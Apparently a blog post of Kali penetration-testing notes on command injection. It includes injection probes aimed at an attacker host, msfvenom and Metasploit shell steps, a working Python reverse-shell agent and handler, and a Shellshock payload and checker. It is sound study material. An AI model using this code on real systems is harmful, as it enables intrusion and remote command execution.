Kali web penetration testing notes (5)
2016-06-12 00:43
Attacking the Server Using Injection-based Flaws

Components likely to be attacked, and the injection flaw that targets each:

Component | Injection flaw |
---|---|
Operating system shell | Command injection |
Relational database (RDBMS) | SQL injection |
Web browser | XSS attack |
LDAP directory | LDAP injection |
XML | XPath injection |
Identifying parameters to inject data: when testing a web application for command injection flaws and you have established that the application interacts with the command line of the underlying OS, the next step is to manipulate and probe the different parameters of the application, since the application may use any one of them to build a command on the web server:

- GET: input parameters are sent in the URL. Any user-controlled parameter sent in a GET request should be tested.
- POST: input parameters are sent in the HTTP body.
- HTTP headers: applications often use header fields to identify end users and display customized information depending on the header values, so headers reach server-side code too. Some of the important header fields to check for command injection:

- Cookie
- X-Forwarded-For
- User-Agent
- Referer
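The following harness, added here as an example and not part of the original notes, parses a constructed HTTP request, enumerates every user-controlled value in the places listed above (query string, form body, cookies, and the User-Agent, Referer and X-Forwarded-For headers), and rebuilds the request with a probe appended to one value at a time. The sample request, the attacker address 10.0.0.5 and the helper names are assumptions made for the demo; the probe is the ping-based out-of-band check discussed later on this page.

```python
"""Enumerate command-injection candidates in a raw HTTP request and build probes.

Added example (not from the original notes).  Everything below works on a
constructed request string; nothing is sent over the network.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Headers the notes single out as frequently reaching server-side commands.
INTERESTING_HEADERS = ("cookie", "x-forwarded-for", "user-agent", "referer")

# Constructed sample request (hypothetical target and values).
SAMPLE_REQUEST = (
    "POST /tools/lookup?host=example.com&fmt=txt HTTP/1.1\r\n"
    "Host: target.internal\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://target.internal/tools\r\n"
    "X-Forwarded-For: 203.0.113.7\r\n"
    "Cookie: session=abc123; lang=en\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=alice&count=2"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split at the first colon only
        headers[name.strip()] = value.strip()
    return method, target, headers, body


def build_request(method, target, headers, body):
    """Serialise the request again, fixing Content-Length for the new body."""
    if body:
        headers["Content-Length"] = str(len(body.encode()))
    head = "\r\n".join([f"{method} {target} HTTP/1.1"]
                       + [f"{k}: {v}" for k, v in headers.items()])
    return head + "\r\n\r\n" + body


def injection_points(raw):
    """Return (location, name, original_value) for every user-controlled value."""
    _method, target, headers, body = parse_request(raw)
    points = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        points.append(("GET", name, value))
    for name, value in parse_qsl(body, keep_blank_values=True):
        points.append(("POST", name, value))
    for name, value in headers.items():
        if name.lower() == "cookie":           # each cookie is its own parameter
            for cookie in value.split(";"):
                cname, _, cvalue = cookie.strip().partition("=")
                points.append(("COOKIE", cname, cvalue))
        elif name.lower() in INTERESTING_HEADERS:
            points.append(("HEADER", name, value))
    return points


def mutate(raw, location, name, payload):
    """Append `payload` to one value, leaving the rest of the request intact."""
    method, target, headers, body = parse_request(raw)
    if location == "GET":
        parts = urlsplit(target)
        query = [(k, v + payload if k == name else v)
                 for k, v in parse_qsl(parts.query, keep_blank_values=True)]
        target = urlunsplit(parts._replace(query=urlencode(query)))
    elif location == "POST":
        body = urlencode([(k, v + payload if k == name else v)
                          for k, v in parse_qsl(body, keep_blank_values=True)])
    elif location == "COOKIE":
        key = next(k for k in headers if k.lower() == "cookie")
        cookies = []
        for cookie in headers[key].split(";"):
            cname, _, cvalue = cookie.strip().partition("=")
            if cname == name:
                cvalue += payload
            cookies.append(f"{cname}={cvalue}")
        headers[key] = "; ".join(cookies)
    else:                                      # "HEADER": raw value, no URL encoding
        headers[name] = headers[name] + payload
    return build_request(method, target, headers, body)


def ping_payload(attacker_ip, separator=";"):
    """Out-of-band probe from the notes: ICMP to a host you run a capture on."""
    return f"{separator} ping -c 4 {attacker_ip}"


def probe_requests(raw, attacker_ip):
    """One mutated request per injection point, ready to be sent by a client."""
    return [(loc, name, mutate(raw, loc, name, ping_payload(attacker_ip)))
            for loc, name, _ in injection_points(raw)]


if __name__ == "__main__":
    for loc, name, req in probe_requests(SAMPLE_REQUEST, "10.0.0.5"):
        print(f"--- {loc} {name}\n{req}\n")
```

Query and body values are form-encoded (`;` becomes `%3B`, spaces become `+`), which the server decodes before the value reaches any command; header and cookie values are injected raw because they are not URL-decoded. The separator is a parameter so the same harness can cycle through the metacharacters described below.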
Error-based and blind command injection: in error-based command injection the output of the injected command, or the resulting error message, is returned in the response. In the other form, blind command injection, the results of the commands you inject are not displayed to the user and no error messages are returned, so the attacker has to rely on other ways to identify whether the command was actually executed on the server. When the output of the command is displayed to the user, you can use any bash or Windows command such as ls, dir, ps or tasklist, depending on the underlying OS. When testing for blind injection, you need to select your commands carefully. As an ethical hacker, the most reliable and safe way to identify the existence of an injection flaw when the application does not display the results is the ping command.

The attacker injects a ping command that sends ICMP packets to a machine under his control and observes them there with a packet capture (for example tcpdump filtering on icmp). This is useful in several ways:

- Since the ping command is almost the same on Linux and Windows, apart from a few option differences (-c sets the packet count on Linux, -n on Windows), the command is sure to run if the application is vulnerable to the injection flaw.
- By analysing the TTL values in the captured ping packets, the attacker can also identify the underlying OS (a default TTL of 64 usually indicates Linux, 128 Windows).
- The ping utility is usually not restricted; even if the application is running under a non-privileged account, the command is very likely to execute. If ICMP is not allowed out of the network, a DNS lookup (nslookup or dig) against a domain whose name server you control is the usual fallback, because DNS is rarely blocked.
- The input buffer is often limited in size and can only accept a finite number of characters, for example the input field for a username. The ping command, along with an IP address and a few additional arguments, easily fits in such fields.
Metacharacters for command separation:

Symbol | Usage |
---|---|
; | The semicolon is the most common metacharacter used to test an injection flaw. The shell runs all the commands separated by semicolons in sequence, regardless of whether the earlier ones succeed. |
&& | The double ampersand runs the command to the right of the metacharacter only if the command to the left exited successfully (status 0). An example would be injecting into the password field along with the correct credentials: the injected command runs once the user is authenticated to the system. |
\|\| | The double pipe is the direct opposite of the double ampersand: it runs the command on the right only if the command on the left failed. Example: cd invalidDir \|\| ping -c 2 attacker.com |
( ) | The grouping metacharacter runs the enclosed commands in a subshell, so their combined output can be redirected into one file. Example: (ps; netstat) > running.txt |
\` | The backtick (command substitution) metacharacter forces the shell to run the command between the backticks and substitute its output in place. Example: variable="OS version: \`uname -a\`" && echo "$variable" |
> | Redirects the output of the command on the left into the file named on the right, creating the file or truncating it if it already exists; >> appends to the file instead. |
\| | The single pipe passes the output of the command on the left as the input of the command on the right. |
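To see each row of the table take effect, the following added example (not code from the original notes) feeds one probe per metacharacter into two command sinks: a vulnerable one that concatenates the value into a command line for /bin/sh, which is the pattern behind every command-injection flaw, and a hardened one that allow-lists the value and passes it as a single argv element with no shell involved. `echo` stands in for the ping or lookup command a real application would run so that it executes anywhere; the probe values and marker strings are constructed for the demo.

```python
"""Shell metacharacters against a vulnerable and a hardened command sink.

Added example, not from the original notes.  Runs locally against /bin/sh.
"""
import re
import subprocess

HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")   # allow-list for a hostname


def run_vulnerable(value):
    """Builds the command line by concatenation and hands it to /bin/sh (do not do this)."""
    cmd = "echo looking up " + value               # value may contain metacharacters
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(value):
    """Validates the value and passes it as a single argv element; no shell parses it."""
    if not HOST_RE.match(value):
        raise ValueError("rejected: not a hostname")
    return subprocess.run(["echo", "looking", "up", value],
                          capture_output=True, text=True).stdout


# One probe per table row: (injected value, marker that appears in the output
# only if the shell interpreted the metacharacter).
PROBES = {
    ";":   ("host; echo INJECTED", "INJECTED"),
    "&&":  ("host && echo INJECTED", "INJECTED"),             # echo succeeded, so right side runs
    "||":  ("host; false || echo INJECTED", "INJECTED"),      # right side runs only after a failure
    "|":   ("host | tr a-z A-Z", "LOOKING UP HOST"),          # echo's output piped into tr
    "`":   ("host`echo INJECTED`", "hostINJECTED"),            # substituted before echo runs
    "( )": ("host; (echo INJ; echo ECTED) | tr -d '\\n'", "INJECTED"),  # grouped output, piped
}


def probe_all(sink):
    """Feed every probe to `sink`; True means the injected command executed."""
    report = {}
    for symbol, (value, marker) in PROBES.items():
        try:
            report[symbol] = marker in sink(value)
        except ValueError:                   # the hardened sink rejected the value
            report[symbol] = False
    return report


if __name__ == "__main__":
    print("vulnerable:", probe_all(run_vulnerable))
    print("hardened:  ", probe_all(run_hardened))
```

The hardened version relies on two independent measures: the value never reaches a shell parser (argv list instead of shell=True), and an allow-list rejects anything that is not a hostname. Quoting with shlex.quote would also neutralise the separators, but an allow-list is easier to reason about and also stops option injection such as a value starting with a dash.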
Wapiti can test for file handling flaws by exploiting include function calls. It scans for old backup files accessible on the server and also attempts to bypass weak .htaccess configurations.

The following are some of the activities that can be performed by exploiting a command injection flaw:

- Viewing files on the web server
- Deleting files on the web server
- Attacking other machines on the internal network of the organization
- Completely owning the web server

Reverse TCP connection: firewall rules are generally more relaxed for traffic flowing from the internal network to the outside than for inbound connections, so a shell that connects back out to the attacker's listener is far more likely to get through than one that opens a listening port on the server.
PHP shell and Metasploit:

- Create a PHP shell using the msfvenom tool.
- Upload it to a web server that can be reached from the target.
- Set up a reverse TCP meterpreter handler in Metasploit on the attacker's machine, waiting for the target to connect.
- Inject the URL of the PHP shell into the vulnerable field of the application, so that the server downloads the PHP shell and runs it.
- The shell then makes an outbound TCP connection to the meterpreter handler waiting on the attacker's machine.
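The mechanics of the last two steps, the connect-back direction and the handler driving the session, are shown in the following added example. It is not code from the original notes or from Metasploit: a minimal handler listens on the attacker side, an agent started on the target connects out to it, executes each command it receives and returns the output. Both ends run in one process on 127.0.0.1 so the example can be executed offline; the length-prefixed framing and the function names are this example's own choices.

```python
"""Reverse TCP connection over loopback: attacker handler and connect-back agent.

Added example, not from the original notes.  The agent connects OUT to the
handler, which is why this direction survives egress-friendly firewall rules.
"""
import socket
import struct
import subprocess
import threading


def send_frame(sock, data):
    """Send bytes prefixed with a 4-byte big-endian length."""
    sock.sendall(struct.pack("!I", len(data)) + data)


def recv_exact(sock, n):
    """Read exactly n bytes; return b'' if the peer closed the socket."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return b""
        buf += chunk
    return buf


def recv_frame(sock):
    """Read one length-prefixed frame; b'' on a closed socket."""
    header = recv_exact(sock, 4)
    if not header:
        return b""
    (length,) = struct.unpack("!I", header)
    return recv_exact(sock, length)


def agent(handler_host, handler_port):
    """Target side: connect back, run each command received, send the output back."""
    with socket.create_connection((handler_host, handler_port)) as sock:
        while True:
            cmd = recv_frame(sock)
            if not cmd or cmd == b"exit":
                break
            # Commands run with the privileges of whatever started the agent
            # (on a real target: the web server's account).
            proc = subprocess.run(cmd.decode(), shell=True, capture_output=True)
            send_frame(sock, proc.stdout + proc.stderr)


def handler(commands, ready, results, port_holder):
    """Attacker side: listen, accept the inbound connection, drive the session."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
        srv.listen(1)
        port_holder.append(srv.getsockname()[1])
        ready.set()                         # tell the caller where to connect
        conn, _peer = srv.accept()
        with conn:
            for cmd in commands:
                send_frame(conn, cmd.encode())
                results.append(recv_frame(conn).decode())
            send_frame(conn, b"exit")


def run_session(commands):
    """Run handler and agent in two threads; return the outputs the handler collected."""
    ready = threading.Event()
    results, port_holder = [], []
    h = threading.Thread(target=handler, args=(commands, ready, results, port_holder))
    h.start()
    ready.wait()                            # handler is listening before the agent dials
    a = threading.Thread(target=agent, args=("127.0.0.1", port_holder[0]))
    a.start()
    h.join()
    a.join()
    return results


if __name__ == "__main__":
    for out in run_session(["echo connected back", "uname -a"]):
        print(out, end="")
```

In the real procedure the handler is Metasploit's multi/handler and the agent is the PHP payload generated by msfvenom; the injected command only has to fetch that file and run it with the PHP interpreter, and everything after that happens over the outbound connection shown here.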
Exploiting Shellshock

The flaw (CVE-2014-6271) was found in the bash shell, where it had existed for many years, and an attacker exploits it simply by passing a specific series of characters to bash in an environment variable:

() { :; };

Since bash is used by many applications, such as DHCP clients, SSH, SIP and SMTP servers, the attack surface is very large. Exploiting the flaw over an HTTP request is still the most common way to do it, as bash is often used together with CGI scripts: the web server copies request headers such as User-Agent into environment variables before invoking the script, so the header value is parsed by bash.
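The following added example (not code from the original notes) reproduces the CGI vector locally: it places the function-definition prefix followed by an extra command into an environment variable named as a CGI server would name the User-Agent header, starts bash, and reports whether the trailing command ran. A vulnerable bash executes the command while importing the function; a patched bash ignores it. The marker string and the helper names are this example's own.

```python
"""Check a bash binary for the Shellshock (CVE-2014-6271) function-import bug.

Added example, not from the original notes.  Only the local bash is tested.
"""
import os
import shutil
import subprocess

MARKER = "SHELLSHOCK_MARKER_7f3a"          # printed only if the trailing command runs
PAYLOAD = "() { :; }; echo " + MARKER      # function definition followed by an extra command


def check_bash(bash_path=None):
    """Return 'vulnerable', 'patched', or None if no bash binary is available."""
    bash = bash_path or shutil.which("bash")
    if bash is None or not os.path.exists(bash):
        return None
    env = dict(os.environ)
    env["HTTP_USER_AGENT"] = PAYLOAD       # what a CGI server sets from the User-Agent header
    result = subprocess.run([bash, "-c", "echo probe"], env=env,
                            capture_output=True, text=True)
    # A vulnerable bash runs the echo while importing the "function" and the
    # marker shows up in stdout before the script's own output.
    return "vulnerable" if MARKER in result.stdout else "patched"


if __name__ == "__main__":
    print(check_bash())
```

Against a live web server the same payload goes into the User-Agent (or any other) header of a request for a CGI script; in blind situations the command after the function body is the ping or DNS lookup described earlier rather than an echo.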